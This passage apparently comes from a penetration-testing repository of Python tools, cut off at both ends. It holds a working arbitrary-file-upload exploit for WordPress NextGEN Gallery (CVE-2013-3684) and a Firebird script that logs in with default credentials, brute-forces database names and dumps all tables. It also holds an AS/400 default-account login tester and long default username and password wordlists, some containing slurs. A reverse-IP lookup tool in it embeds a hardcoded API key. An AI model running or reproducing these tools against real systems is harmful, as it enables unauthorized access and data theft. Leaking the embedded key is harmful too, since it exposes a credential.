Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
') 35 | ****************************************************************************** 36 | -------------------------------------------------------------------------------------------------- 37 | 38 | 39 | -------------------------------------------------------------------------------------------------- 40 | [The below example shows that NextGEN Gallery is not found on host] 41 | 42 | python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress1 43 | [*] Wordpress Plugin: NextGEN Gallery NOT found 44 | -------------------------------------------------------------------------------------------------- 45 | 46 | 47 | -------------------------------------------------------------------------------- /firebird/firebirdBrute.py: -------------------------------------------------------------------------------- 1 | try: 2 | import firebirdsql,sys 3 | except: 4 | print "Download pyfirebirdsql from https://github.com/nakagami/pyfirebirdsql.git" 5 | import argparse 6 | import sys 7 | 8 | def extractDB(database,ipAddr): 9 | con = firebirdsql.connect( 10 | host=ipAddr, database=database, 11 | user='sysdba', password='masterkey' 12 | ) 13 | cur = con.cursor() 14 | cur.execute("select rdb$relation_name from rdb$relations where rdb$view_blr is null and (rdb$system_flag is null or rdb$system_flag = 0);") 15 | results = cur.fetchall() 16 | print "\n- Found the below tables" 17 | for x in results: 18 | print x[0] 19 | 20 | for x in results: 21 | print "\n- Extracing the contents from the table: "+x[0] 22 | cur.execute("select * from "+x[0]+";") 23 | results = cur.fetchall() 24 | print results 25 | 26 | def connectFirebird(ipAddr,wordList): 27 | defaultDB="C:\\PROGRAM FILES\\FIREBIRD\\FIREBIRD_2_5\\EXAMPLES\\EMPBUILD\\EMPLOYEE.FDB" 28 | 29 | #Try getting list of connected databases without attempting any database name guess. 30 | con = firebirdsql.services.connect(host=ipAddr, user='sysdba', password='masterkey') 31 | results = con.getAttachedDatabaseNames() 32 | dbList=[] 33 | if len(results)>0: 34 | for x in results: 35 | if x!=defaultDB: 36 | #Remove the default database 37 | dbList.append(x) 38 | print "\n- Found the below connected databases" 39 | for x in dbList: 40 | print x 41 | for x in dbList: 42 | print "\n- Extracting contents from Firebird database: "+x 43 | extractDB(x,ipAddr) 44 | else: 45 | #Brutefoorce firebird databasess 46 | print "\n- Bruteforcing Firebird database names" 47 | dictList=[] 48 | with open(wordList) as f: 49 | dictList = f.read().splitlines() 50 | currentWord="" 51 | for word in dictList: 52 | currentWord=word 53 | try: 54 | con = firebirdsql.connect( 55 | host=ipAddr, database=word, 56 | user='sysdba', password='masterkey' 57 | ) 58 | print "Correct database name: "+word 59 | break 60 | except firebirdsql.OperationalError: 61 | print "Incorrect database name: "+word 62 | continue 63 | extractDB(currentWord,ipAddr) 64 | 65 | if __name__ == '__main__': 66 | print "This tool attempts to brute force the database names on the Firebird database server using the default credentials (sysdba|masterkey)" 67 | parser = argparse.ArgumentParser() 68 | parser.add_argument('-host', dest='ipAddr', action='store', help='[IP address of Firebird database server]') 69 | parser.add_argument('-wordlist', dest='wordList', action='store', help='[File containing list of database names to brute force]') 70 | 71 | if len(sys.argv)==1: 72 | parser.print_help() 73 | sys.exit(1) 74 | options = parser.parse_args() 75 | if options.ipAddr: 76 | connectFirebird(options.ipAddr,options.wordList) 77 | -------------------------------------------------------------------------------- /wordpress_exploits/cve-2013-3684.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import httplib, mimetypes,urllib2 4 | 5 | 6 | def exists(url): 7 | try: 8 | r = urllib2.urlopen(url) 9 | except urllib2.URLError as e: 10 | r = e 11 | return r.code == 200 12 | 13 | def post_multipart(host, uri, fields, files): 14 | content_type, body = encode_multipart_formdata(fields, files) 15 | h = httplib.HTTPConnection(host) 16 | headers = { 17 | 'User-Agent': 'INSERT USERAGENTNAME', 18 | 'Content-Type': content_type 19 | } 20 | h.request('POST', uri, body, headers) 21 | res = h.getresponse() 22 | return res.status, res.reason, res.read() 23 | 24 | def encode_multipart_formdata(fields, files): 25 | """ 26 | fields is a sequence of (name, value) elements for regular form fields. 27 | files is a sequence of (name, filename, value) elements for data to be uploaded as files 28 | Return (content_type, body) ready for httplib.HTTP instance 29 | """ 30 | BOUNDARY = '----------bound@ry_$' 31 | CRLF = '\r\n' 32 | L = [] 33 | for (key, value) in fields: 34 | L.append('--' + BOUNDARY) 35 | L.append('Content-Disposition: form-data; name="%s"' % key) 36 | L.append('') 37 | L.append(value) 38 | for (key, filename, value) in files: 39 | L.append('--' + BOUNDARY) 40 | L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) 41 | L.append('Content-Type: image/gif') 42 | L.append('') 43 | L.append(value) 44 | L.append('--' + BOUNDARY + '--') 45 | L.append('') 46 | body = CRLF.join(L) 47 | content_type = 'multipart/form-data; boundary=%s' % BOUNDARY 48 | return content_type, body 49 | 50 | 51 | if __name__ == '__main__': 52 | import argparse 53 | parser = argparse.ArgumentParser(__file__) 54 | parser = argparse.ArgumentParser(description="NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684)") 55 | parser.add_argument('-i','--ip', help='IP address or host name', required=True) 56 | parser.add_argument('-u','--uri', help='URI path /wordpress', required=True) 57 | parser.add_argument('-f','--file', help='File to upload', required=True) 58 | args = vars(parser.parse_args()) 59 | 60 | if args['ip']!=None and args['uri']!=None: 61 | uriPath = 'http://'+args['ip']+args['uri']+'/wp-content/plugins/nextgen-gallery/' 62 | if(exists(uriPath)): 63 | print "[*] Wordpress Plugin: NextGEN Gallery found" 64 | 65 | f = open(args['file'],"r") 66 | inputData = f.read() 67 | f.close() 68 | 69 | data = [('name','name'),('galleryselect','1')] 70 | file = [('Filedata','file1.gif',inputData)] 71 | if "?p=1&nggupload=" not in args['uri']: 72 | uri = args['uri']+"/?p=1&nggupload=" 73 | else: 74 | uri = args['uri'] 75 | response = post_multipart(args['ip'],uri,data,file) 76 | if response[0]==200: 77 | print "[*] File has been uploaded successfully. Please check the below location\n" 78 | print "******************************************************************************" 79 | print "http://"+args['ip']+uri.strip("?p=1&nggupload=")+"wp-content/[gallery_name]/file1.gif" 80 | print "******************************************************************************" 81 | else: 82 | print "[*] Wordpress Plugin: NextGEN Gallery NOT found" 83 | 84 | -------------------------------------------------------------------------------- /as400/CodePage.py: -------------------------------------------------------------------------------- 1 | """ 2 | CodePage 3 | Used to convert ascii to ebcdic and ebcdic to ascii 4 | Created by Kenneth J. Pouncey 2002-05-18 5 | Changed by Nate Custer - 2002-05-22 6 | Used some different data types to improve performance/memory usage. 7 | Used a dict (hash table) instead of a list for the lookup tables. 8 | The performance of a lookup is faster if you use a dict. Also; used a 9 | tuple instead of a list for the list at the start. Since tuples aren't 10 | mutable the python interpreter uses less memory to store them. 11 | Cleaned up by P. Bielen - 2002-05-23 12 | Managed a length of 75 characters at one line, to prevend a lot of 13 | editors to do a word-wrap. 14 | """ 15 | 16 | __all__ = ["CodePage"] 17 | 18 | # Tunable parameters 19 | DEBUGLEVEL = 0 20 | 21 | # Conversion table generated mechanically by Free `recode' 3.5 22 | # for sequence IBM037..ISO-8859-1 (reversible). */ 23 | 24 | codePage37 = ( 0, 1, 2, 3, 156, 9, 134, 127, 151, 141, 142, 11, \ 25 | 12, 13, 14, 15, 16, 17, 18, 19, 157, 133, 8, 135, \ 26 | 24, 25, 146, 143, 28, 29, 30, 31, 128, 129, 130, 131, \ 27 | 132, 10, 23, 27, 136, 137, 138, 139, 140, 5, 6, \ 28 | 7, 144, 145, 22, 147, 148, 149, 150, 4, 152, 153, 154, \ 29 | 155, 20, 21, 158, 26, 32, 160, 226, 228, 224, 225, 227, \ 30 | 229, 231, 241, 162, 46, 60, 40, 43, 124, 38, 233, 234, \ 31 | 235, 232, 237, 238, 239, 236, 223, 33, 36, 42, 41, \ 32 | 59, 172, 45, 47, 194, 196, 192, 193, 195, 197, 199, 209, \ 33 | 166, 44, 37, 95, 62, 63, 248, 201, 202, 203, 200, \ 34 | 205, 206, 207, 204, 96, 58, 35, 64, 39, 61, 34, \ 35 | 216, 97, 98, 99, 100, 101, 102, 103, 104, 105, 171, \ 36 | 187, 240, 253, 254, 177, 176, 106, 107, 108, 109, 110, \ 37 | 111, 112, 113, 114, 170, 186, 230, 184, 198, 164, 181, \ 38 | 126, 115, 116, 117, 118, 119, 120, 121, 122, 161, 191, \ 39 | 208, 221, 222, 174, 94, 163, 165, 183, 169, 167, 182, 188, \ 40 | 189, 190, 91, 93, 175, 168, 180, 215, 123, 65, 66, \ 41 | 67, 68, 69, 70, 71, 72, 73, 173, 244, 246, 242, 243, \ 42 | 245, 125, 74, 75, 76, 77, 78, 79, 80, 81, 82, 185, \ 43 | 251, 252, 249, 250, 255, 92, 247, 83, 84, 85, 86, 87, \ 44 | 88, 89, 90, 178, 212, 214, 210, 211, 213, 48, 49, 50, \ 45 | 51, 52, 53, 54, 55, 56, 57, 179, 219, 220, 217, 218, \ 46 | 159) 47 | 48 | class CodePage: #CodePage class. 49 | def __init__(self,codePage=None): #Constructor. 50 | if codePage: 51 | self.setCodePage(codePage) 52 | else: 53 | self.setCodePage(37) 54 | 55 | def setCodePage(self,codePage): 56 | self.ascii = {} 57 | self.ebcdic = {} 58 | if codePage == 37: 59 | cp = codePage37 60 | else: 61 | cp = codePage37 62 | cpi = 0 63 | while cpi < 256: 64 | self.ebcdic[cpi] = cp[cpi] 65 | self.ascii[cp[cpi]] = cpi 66 | cpi += 1 67 | 68 | def getEBCDIC (self,index): 69 | return self.ascii[index] 70 | 71 | def getEBCDICChar (self,index): 72 | return chr(self.ascii[index]) 73 | 74 | def getASCII (self,index): 75 | return self.ebcdic[index] 76 | 77 | def getASCIIChar (self,index): 78 | return chr(self.ebcdic[index]) 79 | 80 | def ebcdic2uni (self,index): 81 | return self.getASCIIChar(index) 82 | 83 | def uni2ebcdic (self,index): 84 | return self.getEBCDICChar(ord(index)) -------------------------------------------------------------------------------- /as400/testAS400.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import time 3 | import sys 4 | import Session 5 | import Screen5250 6 | import ScreenFields 7 | import CodePage 8 | from sys import argv 9 | __all__ = ["testsession"] 10 | myScreen = None 11 | foundText = "" 12 | class testsession: 13 | def __init__(self): 14 | self.first = 1 15 | self.USERID = None 16 | self.PASSWORD = None 17 | def outputScreen(self,initiator,startRow,startColumn,endRow,endColumn): 18 | """ 19 | Callable method to get screen updates 20 | """ 21 | #print 'ScreenUpdated - initiated from ',initiator, \ 22 | # ' Starting from -> ',startRow,endRow,' to -> ',endRow,endColumn 23 | if initiator == 0: ## 0 is from client and 1 is from host 24 | return 25 | # Note we only print the first 12 rows here 26 | indices = range(1,24) 27 | #for idx in indices: 28 | #print myScreen.getPlaneData(idx,1,idx,80,1) 29 | #print self.screen.getPlaneData(idx,1,80,2) 30 | fields = myScreen.getFields() 31 | if self.USERID == None or self.PASSWORD == None: 32 | self.USERID = raw_input("What's your username ? > ") 33 | self.PASSWORD = raw_input("What's your password ? > ") 34 | if self.first == 1: 35 | field = fields.getItem(0) 36 | field.setString(self.USERID) 37 | field = fields.getItem(1) 38 | field.setString(self.PASSWORD) 39 | #for field in fields: 40 | # print field.toString() 41 | # #print field.getText() 42 | 43 | #print fields.readFormatTable(0x42,CodePage.CodePage()) 44 | #print myScreen.getFields().readFormatTable(0x52,CodePage.CodePage()) 45 | # Note we only print the first 12 rows here 46 | indices = range(1,25) 47 | global foundText 48 | for idx in indices: 49 | output = myScreen.getPlaneData(idx,1,idx,80,1) 50 | if "does not exist" in output: 51 | foundText=output 52 | if "cannot sign on" in output: 53 | foundText=output 54 | if "No password associated" in output: 55 | foundText=output 56 | #if len(foundText.strip())>0: 57 | # print foundText 58 | #else: 59 | # print "It might be possible to login with ("+self.USERID+"|"+self.PASSWORD+")" 60 | #print myScreen.getPlaneData(idx,1,idx,80,1) 61 | 62 | #print 'number of fields',myScreen.getFields().getCount() 63 | if self.first < 7: 64 | myScreen.sendAidKey(0xF1) 65 | self.first += 1 66 | if __name__ == '__main__': 67 | parser = argparse.ArgumentParser() 68 | parser.add_argument('-i',dest='hostIP',action='store',help='[IP of AS/400 host]') 69 | parser.add_argument('-p',dest='portNo',action='store',help='[Port of AS/400 host]') 70 | options = parser.parse_args() 71 | 72 | if len(sys.argv)==1: 73 | parser.print_help() 74 | sys.exit() 75 | else: 76 | if options.hostIP and options.portNo: 77 | userList=[] 78 | userList.append(('QSECOFR','QSECOFR')) 79 | userList.append(('QPGWR','QPGWR')) 80 | userList.append(('QUSER','QUSER')) 81 | userList.append(('QSYSOFR','QSYSOFR')) 82 | userList.append(('QSRVBAS','QSRVBAS')) 83 | userList.append(('QSRV','QSRV')) 84 | userList.append(('QDFTOWN','QDFTOWN')) 85 | 86 | host = options.hostIP 87 | 88 | for user in userList: 89 | ts = testsession() 90 | ts.USERID = user[0] 91 | ts.PASSWORD = user[1] 92 | print "\n[*] Testing ("+user[0]+"|"+user[1]+")" 93 | session = Session.Session(host) 94 | session.setPort = options.portNo 95 | session.set_debuglevel(0) 96 | myScreen = session.getScreen() 97 | session.getScreen().add_screen_listener(ts.outputScreen) 98 | session.connect() 99 | time.sleep(2) 100 | if len(foundText.strip())>0: 101 | print foundText 102 | else: 103 | print "It might be possible to login with ("+user[0]+"|"+user[1]+")" 104 | 105 | session.disconnect() 106 | sys.exit() 107 | 108 | -------------------------------------------------------------------------------- /ip2domains.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import urllib2, socket,sys,base64,os 3 | from xml.dom.minidom import parse, parseString 4 | import socket 5 | from urlparse import urlparse 6 | import commands 7 | 8 | 9 | bingAPIKey = '40Mem6C6yp/FDmkBYaCtgEs7GdiNIGeod+n7T8ol2x0' 10 | 11 | def isOpen(ip,port): 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | try: 14 | s.connect((ip, int(port))) 15 | s.shutdown(2) 16 | return True 17 | except: 18 | return False 19 | 20 | 21 | def RunCommand(fullCmd): 22 | try: 23 | #print fullCmd 24 | return commands.getoutput(fullCmd) 25 | except: 26 | return "Error executing command %s" %(fullCmd) 27 | 28 | 29 | def getIP(domain): 30 | try: 31 | return socket.gethostbyname(domain) 32 | except socket.gaierror: 33 | return "" 34 | def getSSLcertname(ip): 35 | fullCmd = "nmap --script=ssl-cert -p 443 "+ip 36 | results = RunCommand(fullCmd) 37 | resultsList = results.split("\n") 38 | for line in resultsList: 39 | if "| ssl-cert: Subject: commonName=" in line and "*." not in line: 40 | hostName = line.replace("| ssl-cert: Subject: commonName=","").split("/")[0] 41 | hostName = hostName.strip() 42 | if hostName: 43 | return hostName 44 | 45 | def reverseBing(ip): 46 | sites = [] 47 | skip = 0 48 | top = 100 49 | port = 443 50 | if isOpen(ip,port): 51 | if getSSLcertname(ip): 52 | sites.append(getSSLcertname(ip)) 53 | while skip < 200: 54 | try: 55 | url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(ip,top,skip) 56 | request = urllib2.Request(url) 57 | auth = base64.encodestring("%s:%s" % (bingAPIKey, bingAPIKey)).replace("\n", "") 58 | request.add_header("Authorization", "Basic %s" % auth) 59 | res = urllib2.urlopen(request) 60 | data = res.read() 61 | 62 | xmldoc = parseString(data) 63 | site_list = xmldoc.getElementsByTagName('d:Url') 64 | for site in site_list: 65 | domain = site.childNodes[0].nodeValue 66 | domain = domain.split("/")[2] 67 | tmpDomain = domain 68 | if ":" in domain: 69 | domain = domain.split(":")[0] 70 | if tmpDomain not in sites: 71 | siteIP = getIP(domain) 72 | if ip not in sites: 73 | #if ip!=siteIP: 74 | # sites.append(ip) 75 | if ip==siteIP: 76 | sites.append(tmpDomain) 77 | except urllib2.URLError: 78 | continue 79 | skip += 50 80 | return sites 81 | 82 | parser = argparse.ArgumentParser(description='IP to DNS Name') 83 | parser.add_argument('-host', help='Enter an IP address or Domain name') 84 | parser.add_argument('-file', help='File containing list of IP addresses') 85 | args = parser.parse_args() 86 | if args.host==None and args.file==None: 87 | print "\n[!] Please run 'python "+sys.argv[0]+" -h'\n" 88 | sys.exit() 89 | else: 90 | if args.file: 91 | filename = args.file 92 | ipList = [] 93 | with open(filename) as f: 94 | ipList = f.read().splitlines() 95 | for host in ipList: 96 | tmpHost = host 97 | if "http" in tmpHost or "https" in tmpHost: 98 | parse_object = urlparse(tmpHost) 99 | fqdn = str(parse_object.hostname) 100 | tmpHost = fqdn 101 | if any(c.isalpha() for c in tmpHost)==False: 102 | if len(bingAPIKey)<1: 103 | sys.exit("[!] Please check your bingAPIKey !") 104 | sites = reverseBing(tmpHost) 105 | if sites: 106 | for site in sites: 107 | if site!=None: 108 | print tmpHost+"\t"+site 109 | else: 110 | print tmpHost 111 | else: 112 | print tmpHost 113 | elif args.host: 114 | tmpHost = args.host 115 | if "http" in tmpHost or "https" in tmpHost: 116 | parse_object = urlparse(tmpHost) 117 | fqdn = str(parse_object.hostname) 118 | tmpHost = fqdn 119 | if any(c.isalpha() for c in tmpHost)==False: 120 | if len(bingAPIKey)<1: 121 | sys.exit("[!] Please check your bingAPIKey !") 122 | sites = reverseBing(tmpHost) 123 | for site in sites: 124 | print tmpHost+"\t"+site 125 | -------------------------------------------------------------------------------- /default_accounts_wordlist/passwords.txt: -------------------------------------------------------------------------------- 1 | 100198 2 | 1064 3 | 11111111 4 | 12345 5 | 123456 6 | 1RRWTTOOI 7 | 2222 8 | 22222222 9 | 31994 10 | 3ep5w2u 11 | 4Dgifts 12 | 4tas 13 | 744 14 | ACCESS 15 | ADMIN 16 | ALLIN1 17 | ALLIN1MAIL 18 | ALLINONE 19 | APPLSYS 20 | ARCHIVIST 21 | AUTORAID 22 | Administrator 23 | Asante 24 | Ascend 25 | BACKUP 26 | BATCH 27 | CAROLIAN 28 | CCC 29 | CHANGE_ON_INSTALL 30 | CHEY_ARCHSVR 31 | CNAS 32 | COGNOS 33 | CONV 34 | Cisco router 35 | DCL 36 | DECMAIL 37 | DECNET 38 | DEFAULT 39 | DEMO 40 | DIGITAL 41 | DISC 42 | DISCAR 43 | FAX 44 | FAXUSER 45 | FAXWORKS 46 | FIELD 47 | FIELD.SUPPORT 48 | GATEWAY 49 | GUEST 50 | GUESTGUE 51 | GUESTGUEST 52 | Guest 53 | HARRIS 54 | HELP 55 | HELPDESK 56 | HOST 57 | HP 58 | HPDESK 59 | HPLASER 60 | HPOFFICE 61 | HPOFFICE DATA 62 | HPONLY 63 | HPP187 64 | HPP187 SYS 65 | HPP189 66 | HPP196 67 | HPWORD PUB 68 | INFO 69 | INGRES 70 | INTX3 71 | INVALID 72 | ITF3000 73 | Intel 74 | LASER 75 | LASERWRITER 76 | LINK 77 | LOTUS 78 | MAIL 79 | MAILER 80 | MANAGER 81 | MANAGER.SYS 82 | MBMANAGER 83 | MBWATCH 84 | MGR 85 | MGR.SYS 86 | MPE 87 | MTYSYS 88 | Mau dib 89 | NETBASE 90 | NETCON 91 | NETFRAME 92 | NETMGR 93 | NETNONPRIV 94 | NETPRIV 95 | NETSERVER 96 | NEWINGRES 97 | NEWS 98 | NF 99 | NFI 100 | NICONEX 101 | NONPRIV 102 | NeXT 103 | No 104 | OP.OPERATOR 105 | OPERATOR 106 | OPERVAX 107 | PASSWORD 108 | PDP11 109 | PDP8 110 | PO8 111 | POST 112 | POSTMASTER 113 | PRINT 114 | PRINTER 115 | PRIV 116 | REGO 117 | REMOTE 118 | REPORT 119 | RJE 120 | ROBELLE 121 | ROOT 122 | RSX 123 | SABRE 124 | SECURITY 125 | SERVICE 126 | SQL 127 | STUDENT 128 | SUPERVISOR 129 | SUPPORT 130 | SYS 131 | SYSLIB 132 | SYSMAINT 133 | SYSTEM 134 | SYSTEST 135 | SYSTEST_CLIG 136 | SY_MB 137 | Sysop 138 | TCH 139 | TELEDEMO 140 | TELESUP 141 | TEST 142 | TIGER 143 | TRACE 144 | TSEUG 145 | UETP 146 | USER 147 | USERP 148 | USER_TEMPLATE 149 | User 150 | VAX 151 | VESOFT 152 | VMS 153 | WANGTEK 154 | WINDOWS_PASSTHRU 155 | WINSABRE 156 | WORD 157 | XLSERVER 158 | ____BLANK___ 159 | abc123 160 | access 161 | accounting 162 | adm 163 | admin 164 | admin1 165 | adminttd 166 | admn 167 | anon 168 | ascend 169 | atc456 170 | attack 171 | autocad 172 | bbs 173 | bciimpw 174 | bcimpw 175 | bcmspw 176 | bcnaspw 177 | bin 178 | bintec 179 | biodata 180 | bloggs 181 | bluepw 182 | boss 183 | browsepw 184 | c 185 | cascade 186 | cc 187 | ccrusr 188 | changeme 189 | checkfs 190 | checkfsys 191 | checksys 192 | cisco 193 | comcomcom 194 | craft 195 | craftpw 196 | custpw 197 | daemon 198 | danger 199 | default 200 | demos 201 | dhrhdhhhh 202 | dni 203 | enquirypw 204 | enter 205 | fal 206 | fax 207 | field 208 | file 209 | ftp 210 | games 211 | ganteng 212 | gen1 213 | gen2 214 | gopher 215 | guest 216 | guest1 217 | guestgue 218 | halt 219 | hello 220 | help 221 | hp 222 | ibmcel 223 | inads 224 | indspw 225 | initpw 226 | install 227 | james 228 | javascript faggots 229 | kahn 230 | kilo1987 231 | l2 232 | l3 233 | lineprin 234 | locatepw 235 | looker 236 | lp 237 | lpadm 238 | lpadmin 239 | lucenttech1 240 | lucenttech2 241 | lynx 242 | m1122 243 | mail 244 | maint 245 | maintain 246 | maintpw 247 | man 248 | manager 249 | managers 250 | master 251 | masterkey 252 | me 253 | mediator 254 | mfd 255 | mlusr 256 | mountfs 257 | mountfsys 258 | mountsys 259 | my_DEMARC 260 | ncrm 261 | netlink 262 | news 263 | nmspw 264 | nobody 265 | nokia 266 | none 267 | ntacdmax 268 | oem_temp 269 | operator 270 | pakistan 271 | password 272 | passwordguy 273 | patrol 274 | plsdontguess 275 | postmast 276 | powerdown 277 | prime 278 | primenet 279 | primeos 280 | primos 281 | private 282 | qpgmr 283 | qsecofr 284 | qserv 285 | qsrv 286 | qsrvbas 287 | qsvr 288 | qsysopr 289 | quser 290 | rainbow 291 | rcustpw 292 | replicator 293 | rje 294 | rmnetlm 295 | ro 296 | rw 297 | rwa 298 | rwmaint 299 | sa 300 | sasasa 301 | secoff 302 | secofr 303 | service 304 | shutdown 305 | signa 306 | software 307 | specialist 308 | speedxess 309 | supervisor 310 | support 311 | supportpw 312 | symantec 313 | sync 314 | sys 315 | sysadm 316 | sysadmin 317 | sysbin 318 | syslib 319 | system 320 | system_admin 321 | tele 322 | tellabs#1 323 | tetra 324 | tour 325 | trouble 326 | tutor 327 | uClinux 328 | umountfs 329 | umountfsys 330 | umountsys 331 | unix 332 | utstar 333 | uucp 334 | uucpadm 335 | web 336 | webmaster 337 | www 338 | xxyyzz 339 | year2000 340 | -------------------------------------------------------------------------------- /default_accounts_wordlist/users.txt: -------------------------------------------------------------------------------- 1 | $ALOC$ 2 | 1 3 | 1.1 4 | 11111111 5 | 1234567890 6 | 2 7 | 22222222 8 | 30 9 | 31994 10 | 4Dgifts 11 | 5 12 | 7 13 | ADMIN 14 | ADMN 15 | ADVMAIL 16 | ALLIN1 17 | ALLIN1MAIL 18 | ALLINONE 19 | AP2SVP 20 | APL2PP 21 | APPLSYS 22 | ARCHIVIST 23 | AURORA@ORB@UNAUTHENTICATED 24 | AUTOLOG1 25 | Admin 26 | Administrator 27 | Any 28 | BACKUP 29 | BATCH 30 | BATCH1 31 | BATCH2 32 | CCC 33 | CHEY_ARCHSVR 34 | CMSBATCH 35 | CMSUSER 36 | CPNUC 37 | CPRM 38 | CSPUSER 39 | CTXSYS 40 | CVIEW 41 | DATAMOVE 42 | DBA 43 | DCL 44 | DECMAIL 45 | DECNET 46 | DEFAULT 47 | DEMO 48 | DEMO1 49 | DEMO2 50 | DEMO3 51 | DEMO4 52 | DIRECT 53 | DIRMAINT 54 | DISKCNT 55 | EREP 56 | Ezsetup 57 | FAX 58 | FAXUSER 59 | FAXWORKS 60 | FIELD 61 | FSFADMIN 62 | FSFTASK1 63 | FSFTASK2 64 | GATEWAY 65 | GCS 66 | GEN1 67 | GEN2 68 | GUEST 69 | Guest 70 | HELLO 71 | HELP 72 | HELPDESK 73 | HOST 74 | HPLASER 75 | IDMS 76 | IDMSSE 77 | IIPS 78 | INFO 79 | INGRES 80 | IPFSERV 81 | ISPVM 82 | IS_$hostname 83 | IVPM1 84 | IVPM2 85 | IntraStack 86 | IntraSwitch 87 | LASER 88 | LASERWRITER 89 | LIBRARY 90 | LINK 91 | LessonUser1 92 | LessonUser2 93 | MAIL 94 | MAILER 95 | MAINT 96 | MANAGER 97 | MBMANAGER 98 | MBWATCH 99 | MCVEADMIN 100 | MGE 101 | MGR 102 | MICRO 103 | MOESERV 104 | MTYSYS 105 | N/A 106 | NETCON 107 | NETMGR 108 | NETNONPRIV 109 | NETPRIV 110 | NETSERVER 111 | NEVIEW 112 | NEWINGRES 113 | NEWS 114 | NICONEX 115 | OLTSEP 116 | OP1 117 | OPERATNS 118 | OPERATOR 119 | OPERVAX 120 | OutOfBox 121 | PCUSER 122 | PDMREMI 123 | PDP11 124 | PDP8 125 | PENG 126 | PO8 127 | POST 128 | POSTMASTER 129 | PRINT 130 | PRINTER 131 | PRIV 132 | PROCAL 133 | PRODBM 134 | PROMAIL 135 | PSFMAINT 136 | PVM 137 | RDM470 138 | REPORT 139 | RJE 140 | RMUser1 141 | ROOT 142 | ROUTER 143 | RSBCMON 144 | RSCS 145 | RSCSV2 146 | SABRE 147 | SAVSYS 148 | SCOTT 149 | SETUP 150 | SFCMI 151 | SFCNTRL 152 | SMART 153 | SPOOLMAN 154 | SQLDBA 155 | SQLUSER 156 | STUDENT 157 | SUPERVISOR 158 | SYS 159 | SYSADM 160 | SYSADMIN 161 | SYSCKP 162 | SYSDBA 163 | SYSDUMP1 164 | SYSERR 165 | SYSMAINT 166 | SYSMAN 167 | SYSTEM 168 | SYSTEST 169 | SYSTEST_CLIG 170 | SYSWRM 171 | Sysop 172 | TDISK 173 | TELEDEMO 174 | TEMP 175 | TEST 176 | TRACESRV 177 | TSAFVM 178 | UETP 179 | USER 180 | USERP 181 | USER_TEMPLATE 182 | User 183 | VASTEST 184 | VAX 185 | VM3812 186 | VMARCH 187 | VMASMON 188 | VMASSYS 189 | VMBACKUP 190 | VMBSYSAD 191 | VMMAP 192 | VMS 193 | VMTAPE 194 | VMTLIBR 195 | VMUTIL 196 | VSEIPO 197 | VSEMAINT 198 | VSEMAN 199 | VTAM 200 | VTAMUSER 201 | WANGTEK 202 | WINDOWS_PASSTHRU 203 | WINSABRE 204 | WP 205 | accounting 206 | adm 207 | admin 208 | admin2 209 | administrator 210 | adminstrator 211 | adminttd 212 | ami 213 | anon 214 | autocad 215 | bbs 216 | bciim 217 | bcim 218 | bcms 219 | bcnas 220 | bin 221 | blue 222 | boss 223 | browse 224 | ccrusr 225 | checkfs 226 | checkfsys 227 | checksys 228 | cisco 229 | config 230 | craft 231 | cust 232 | daemon 233 | demo 234 | demos 235 | deskalt 236 | deskman 237 | desknorm 238 | deskres 239 | diag 240 | disttech 241 | dni 242 | drhhdrhhd 243 | enable 244 | enquiry 245 | fal 246 | fax 247 | field 248 | file 249 | ftp 250 | ftp_admi 251 | fucking 252 | games 253 | gonzo 254 | gopher 255 | gropher 256 | guest 257 | guest1 258 | halt 259 | handsome_123_handsome 260 | ibm 261 | inads 262 | init 263 | install 264 | intelligent_guy_priyank 265 | james 266 | khan 267 | l2 268 | l3 269 | locate 270 | lp 271 | lpadm 272 | lpadmin 273 | lynx 274 | m1122 275 | mail 276 | maint 277 | man 278 | manager 279 | managers 280 | manuf 281 | me 282 | mediator 283 | memotec 284 | mfd 285 | mlusr 286 | mountfs 287 | mountfsys 288 | mountsys 289 | n/a 290 | ncrm 291 | netlink 292 | netrangr 293 | news 294 | nms 295 | nobody 296 | nop 297 | nuucp 298 | operator 299 | oracle 300 | patrol 301 | postmaster 302 | powerdown 303 | prime 304 | primenet 305 | primos_cs 306 | qpgmr 307 | qsecofr 308 | qserv 309 | qsrv 310 | qsrvbas 311 | qsvr 312 | qsysopr 313 | quser 314 | rcust 315 | readonly 316 | readwrite 317 | replicator 318 | rje 319 | ro 320 | root 321 | rw 322 | rwa 323 | sa 324 | satan 325 | secoff 326 | secofr 327 | setup 328 | sherzad420 329 | shutdown 330 | signa 331 | snake 332 | software 333 | storwatch 334 | stuccoboy 335 | supervisor 336 | support 337 | sync 338 | sys 339 | sysadm 340 | sysadmin 341 | sysbin 342 | system 343 | system_admin 344 | teacher 345 | tech 346 | tele 347 | tellabs 348 | temp1 349 | topicalt 350 | topicnorm 351 | topicres 352 | tour 353 | trouble 354 | tutor 355 | umountfs 356 | umountfsys 357 | umountsys 358 | unix 359 | uucp 360 | uucpadm 361 | web 362 | webmaster 363 | www 364 | -------------------------------------------------------------------------------- /cenzic/url2cenzic.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | import socket 3 | import argparse 4 | import sys 5 | import multiprocessing 6 | 7 | numProcess=10 8 | default_timeout = 10 9 | socket.setdefaulttimeout(default_timeout) 10 | 11 | def get_redirected_url(url): 12 | try: 13 | opener = urllib2.build_opener(urllib2.HTTPRedirectHandler) 14 | opener.addheaders = [('User-agent', 'Mozilla/5.0')] 15 | urllib2.install_opener(opener) 16 | request = opener.open(url) 17 | return request.url 18 | #except urllib2.HTTPError: 19 | # return None 20 | #except urllib2.URLError: 21 | # return None 22 | except Exception as e: 23 | #return str(e) 24 | return None 25 | 26 | 27 | class Worker(multiprocessing.Process): 28 | 29 | def __init__(self, 30 | work_queue, 31 | result_queue, 32 | ): 33 | # base class initialization 34 | multiprocessing.Process.__init__(self) 35 | self.work_queue = work_queue 36 | self.result_queue = result_queue 37 | self.kill_received = False 38 | 39 | def run(self): 40 | while (not (self.kill_received)) and (self.work_queue.empty()==False): 41 | try: 42 | job = self.work_queue.get_nowait() 43 | except: 44 | break 45 | 46 | (jobid,url) = job 47 